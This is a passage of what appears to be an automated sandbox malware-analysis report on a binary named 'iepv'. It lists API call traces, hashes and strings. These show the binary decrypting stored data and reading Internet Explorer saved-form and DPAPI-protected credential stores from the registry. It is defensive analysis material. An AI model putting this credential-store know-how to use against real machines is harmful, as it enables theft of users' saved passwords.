                                        • memcmp.MSVCRT(?,?,00000014,?,00000001,0040323B,?,00000002,-000000D3,?,000000D0,?,?,?,?,?), ref: 00403E3E
                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?), ref: 00403E4F
                                        • memcpy.MSVCRT(00000000,?,00000000,?,?,000000D0,0040323B,?,?,?,?,?,?,?), ref: 00403E85
                                        • CryptDecrypt.ADVAPI32(000000D0,00000000,00000001,00000000,00000000,00000000,?,?,?,000000D0,0040323B,?,?,?,?,?), ref: 00403E99
                                        • LocalFree.KERNEL32(00000000,?,?,?,000000D0,0040323B,?,?,?,?,?,?,?), ref: 00403EB4
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-000000F4,?,00000000), ref: 00403EBA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$ByteCharLocalMultiWidememcmpwcslen$AllocCloseCryptDecryptErrorFileFreeHandleLastSize_snprintf
                                        • String ID:
                                        • API String ID: 759237780-0
                                        • Opcode ID: 9f63a6c8df6a41276d9e9b54e8453c4e309d1c662af558ed0f70dc69021f87d9
                                        • Instruction ID: 5a396e25a0e2e371601baf4a11bb5320a663969d7504980d27075c5fdfef9917
                                        • Opcode Fuzzy Hash: 9f63a6c8df6a41276d9e9b54e8453c4e309d1c662af558ed0f70dc69021f87d9
                                        • Instruction Fuzzy Hash: AF812EB190021DBFDB11DFA4CC819EEBBBCAF08314F104666F515F7291E374AA498BA5
                                        Function 0040561D Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00405627
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405644
                                        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405655
                                        • GlobalLock.KERNEL32(00000000), ref: 00405662
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405675
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405684
                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040568D
                                        • GetLastError.KERNEL32 ref: 00405695
                                        • CloseHandle.KERNEL32(?), ref: 004056A1
                                        • GetLastError.KERNEL32 ref: 004056AC
                                        • CloseClipboard.USER32 ref: 004056B5
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: f2f17b07bb0335d9a99cc59ec3e918da205252a17b05eee3ff07b88de48dafc0
                                        • Instruction ID: b3381adad55cc61a9571f3bb3b737ed98b2e7952980a3a8cd54df1fddcaa999b
                                        • Opcode Fuzzy Hash: f2f17b07bb0335d9a99cc59ec3e918da205252a17b05eee3ff07b88de48dafc0
                                        • Instruction Fuzzy Hash: C7116D71500215ABD7005BB2EE4CB9F7BBCEB04316F104975F606F52A0DB7589608E69
                                        Function 004036F8 Relevance: 13.6, APIs: 9, Instructions: 97encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • memset.MSVCRT ref: 00403720
                                        • memset.MSVCRT ref: 00403734
                                        • memset.MSVCRT ref: 00403748
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                        • CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                        • CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                        • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403810
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$memset$Datamemcpy$AcquireContextCreateDestroy
                                        • String ID:
                                        • API String ID: 1743922700-0
                                        • Opcode ID: 14e35629a3128bee0613ca533326d652462d5b947327fdc8313b13da73cddeeb
                                        • Instruction ID: b8e6fa0fa88a7313e6858724cb14324743422fb50e59470404461193ba04ef97
                                        • Opcode Fuzzy Hash: 14e35629a3128bee0613ca533326d652462d5b947327fdc8313b13da73cddeeb
                                        • Instruction Fuzzy Hash: DB3152B190121DBFDB11AF65CD84EDA7BACEF04348F0080B6BA58E7191D6789F449B64
                                        Function 004034C9 Relevance: 7.6, APIs: 5, Instructions: 55encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 004034EB
                                        • CryptHashData.ADVAPI32(?,0040360D,00000040,00000000,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 00403504
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 00403514
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,0040360D,00000000,00008004,?,?,?,?,?,?,0040360D,?,00000000,?), ref: 00403530
                                        • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 0040353C
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Data$AcquireContextCreateDestroyParam
                                        • String ID:
                                        • API String ID: 1860763720-0
                                        • Opcode ID: 4b877a1ff959f46b9567c7ff794a0d3c174698d1a9414c58fd4b414061876083
                                        • Instruction ID: d00e77c013bb9a1e19c89b7e5eb9daec37152487e97aaaa4dd5898c3e5fda709
                                        • Opcode Fuzzy Hash: 4b877a1ff959f46b9567c7ff794a0d3c174698d1a9414c58fd4b414061876083
                                        • Instruction Fuzzy Hash: 3C0179B2500118BFEB019FA2CC85D9EBF7CEB04394F108436FA04B2160D771CE20AB68
                                        Function 00406B3F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,0002001F,?,?,?,?,00401F08), ref: 00406B5A
                                        • RegDeleteValueA.ADVAPI32(?,?,?,?,?,00401F08), ref: 00406B6A
                                        • RegCloseKey.ADVAPI32(?,?,?,?,00401F08), ref: 00406B78
                                        Strings
                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00406B50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 849931509-680441574
                                        • Opcode ID: c81cf22c6fabc66e4bee59be94239d7f4bb3587603230103c54f94c07f3894af
                                        • Instruction ID: 6b20d1d0df886fc3f1f553280bd720f214ad9360600cc10c6d05b814fa5e3032
                                        • Opcode Fuzzy Hash: c81cf22c6fabc66e4bee59be94239d7f4bb3587603230103c54f94c07f3894af
                                        • Instruction Fuzzy Hash: 0FE01271600238BBDB105BA2DE09E9BBE7CEB14794B100435FA06F1151D6B59A20DA98
                                        Function 0040345F Relevance: 6.0, APIs: 4, Instructions: 43encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,?,?,00403859,?,00000000,00000000,?), ref: 0040347C
                                        • CryptHashData.ADVAPI32(?,00000000,00000000,00000000,?,00403859,?,00000000,00000000,?), ref: 00403490
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000,00008004,?,00403859,?,00000000,00000000,?), ref: 004034B0
                                        • CryptDestroyHash.ADVAPI32(?,?,00403859,?,00000000,00000000,?), ref: 004034BB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                        • String ID:
                                        • API String ID: 1643522540-0
                                        • Opcode ID: e6a31848da2750c105475134efa90e1f688eff6c570cb0a6ecf737a01f34a179
                                        • Instruction ID: 9a451bcebaa05c3b6c0cb3a898a59c77740f218fb4eab63ae73c8459247e7455
                                        • Opcode Fuzzy Hash: e6a31848da2750c105475134efa90e1f688eff6c570cb0a6ecf737a01f34a179
                                        • Instruction Fuzzy Hash: 30F01D71500118FFEB019FA6DD89D9E7B6DFB08355B008436BA05E5161D775CE209B64
                                        Function 00403635 Relevance: 4.5, APIs: 3, Instructions: 40encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403720
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403734
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403748
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                          • Part of subcall function 004036F8: CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,000000D0,?,00403E30,?,00000001,0040323B,?,00000002), ref: 00403666
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,000000D0,?,00403E30,?,00000001,0040323B,?,00000002), ref: 00403672
                                        • CryptGetHashParam.ADVAPI32(?,00000002,000000D0,?,00000000,00008004,?,00403E30,?,00000001,0040323B,?,00000002,-000000D3,?,000000D0), ref: 0040368E
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CryptHash$Data$memset$memcpy$CreateParam
                                        • String ID:
                                        • API String ID: 691630331-0
                                        • Opcode ID: 21be408687e41982e73ded46756a3dc6091b572a3391f3c753abb2be30f0aac5
                                        • Instruction ID: 5cf852195970a62b2ecae631277351066405a7b3628ea7fe337fa0e3e3163c91
                                        • Opcode Fuzzy Hash: 21be408687e41982e73ded46756a3dc6091b572a3391f3c753abb2be30f0aac5
                                        • Instruction Fuzzy Hash: EAF0F632000159BBCF225F56DC05CDB3F6EFB84765F04852ABA24A6160C7729A20EBA4
                                        Function 0040369A Relevance: 4.5, APIs: 3, Instructions: 34encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403720
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403734
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403748
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                          • Part of subcall function 004036F8: CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptHashData.ADVAPI32(00403E7A,00000000,000000D0,00000000,?,00403E7A,00403E7A,000000D0), ref: 004036C7
                                        • CryptDeriveKey.ADVAPI32(000000D0,00006603,00403E7A,00A80004,?,?,00403E7A,00403E7A,000000D0), ref: 004036DF
                                        • CryptDestroyHash.ADVAPI32(00403E7A), ref: 004036EA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Datamemset$memcpy$CreateDeriveDestroy
                                        • String ID:
                                        • API String ID: 3896772585-0
                                        • Opcode ID: c5d0e55c481ce3b13496b9d6dcb70f892fa54cd53cd6a11a2bd834e00d1b1445
                                        • Instruction ID: 44e90c607e6209aa9459c9a2c4f95b2697e1a2ad7cb6c048210f5492c182dd50
                                        • Opcode Fuzzy Hash: c5d0e55c481ce3b13496b9d6dcb70f892fa54cd53cd6a11a2bd834e00d1b1445
                                        • Instruction Fuzzy Hash: 84F0A936500119BBDF225F95DC09E9ABF69EB04761F048532FA15AA270C7728A30ABA4
                                        Function 00403391 Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AcquireContextCrypt
                                        • String ID:
                                        • API String ID: 3951991833-0
                                        • Opcode ID: 3b5615ebe941a9a81dd6eccc60e94903900e891735debf004889eb2f07e5d409
                                        • Instruction ID: 5608fb8a19430fbc1a30ce7a14a882dfbb49de9bc70487ff80e39b615427bb3a
                                        • Opcode Fuzzy Hash: 3b5615ebe941a9a81dd6eccc60e94903900e891735debf004889eb2f07e5d409
                                        • Instruction Fuzzy Hash: 9AC012B0624221AEEF2C0B228E9AB23265CAB10707F0008BABA01F4190FAB498549529
                                        Function 0040337E Relevance: 1.5, APIs: 1, Instructions: 8encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptReleaseContext.ADVAPI32(?,00000000,00402652), ref: 00403387
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ContextCryptRelease
                                        • String ID:
                                        • API String ID: 829835001-0
                                        • Opcode ID: 7c88731a7504f552f264407fd77c281916d10f2d699e7f60da82b23929a0aa95
                                        • Instruction ID: e0ae15e2777a42615f0fc0b52da8459c9a630cda12a1bac885029add2a630265
                                        • Opcode Fuzzy Hash: 7c88731a7504f552f264407fd77c281916d10f2d699e7f60da82b23929a0aa95
                                        • Instruction Fuzzy Hash: CBC092306003019BEB308F25CD49B1276E8AF40B02FA00869A990E90D0DBB8E450CA2D
                                        Function 00407162 Relevance: 56.3, APIs: 25, Strings: 7, Instructions: 265stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$strchr
                                        • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                        • API String ID: 691317191-1843504584
                                        • Opcode ID: 64ae45c69317c8d5a8cdbc06d97254c38d343c4c6fccfcd6bd6cc5379d7ab00d
                                        • Instruction ID: 3a0f13ae24b23bade33cb64b2ccb3be8b7dae0a4221c21c64eb3c4d2ede0942a
                                        • Opcode Fuzzy Hash: 64ae45c69317c8d5a8cdbc06d97254c38d343c4c6fccfcd6bd6cc5379d7ab00d
                                        • Instruction Fuzzy Hash: 6F918072D04219AAEB20DF91CC86FAF776CAF54314F1044BBFD08B61C1EA78B9548B65
                                        Function 0040C4B9 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 264stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040C4E6
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040C4F2
                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 0040C501
                                        • GetWindowLongA.USER32(?,000000F0), ref: 0040C50D
                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0040C516
                                        • GetWindowLongA.USER32(?,000000EC), ref: 0040C522
                                        • GetWindowRect.USER32(00000000,?), ref: 0040C534
                                        • GetWindowRect.USER32(?,?), ref: 0040C53F
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C553
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C561
                                        • 73A1A570.USER32(?,?,?), ref: 0040C59A
                                        • strlen.MSVCRT ref: 0040C5DA
                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040C5EB
                                        • sprintf.MSVCRT ref: 0040C6F6
                                        • SetWindowTextA.USER32(?,?), ref: 0040C70A
                                        • SetWindowTextA.USER32(?,00000000), ref: 0040C728
                                        • GetDlgItem.USER32(?,00000001), ref: 0040C75E
                                        • GetWindowRect.USER32(00000000,?), ref: 0040C76E
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C77C
                                        • GetClientRect.USER32(?,?), ref: 0040C793
                                        • GetWindowRect.USER32(?,?), ref: 0040C79D
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040C7E3
                                        • GetClientRect.USER32(?,?), ref: 0040C7ED
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040C825
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$A570ExtentPoint32sprintfstrlen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 4065480583-3046471546
                                        • Opcode ID: ac05241936f2d2ff163d095bc9836d102f638af11ece16d3f32f3c81e010e75d
                                        • Instruction ID: 6aad9ee015615c23f100dea8964b97ccebe7d6c2e33fb7990f14215551546888
                                        • Opcode Fuzzy Hash: ac05241936f2d2ff163d095bc9836d102f638af11ece16d3f32f3c81e010e75d
                                        • Instruction Fuzzy Hash: CDB1D171108301AFD710DFA9C985E6BBBE9FF88704F00492DF695922A1D775E8148F16
                                        Function 004010E5 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113D
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401184
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401191
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011BF
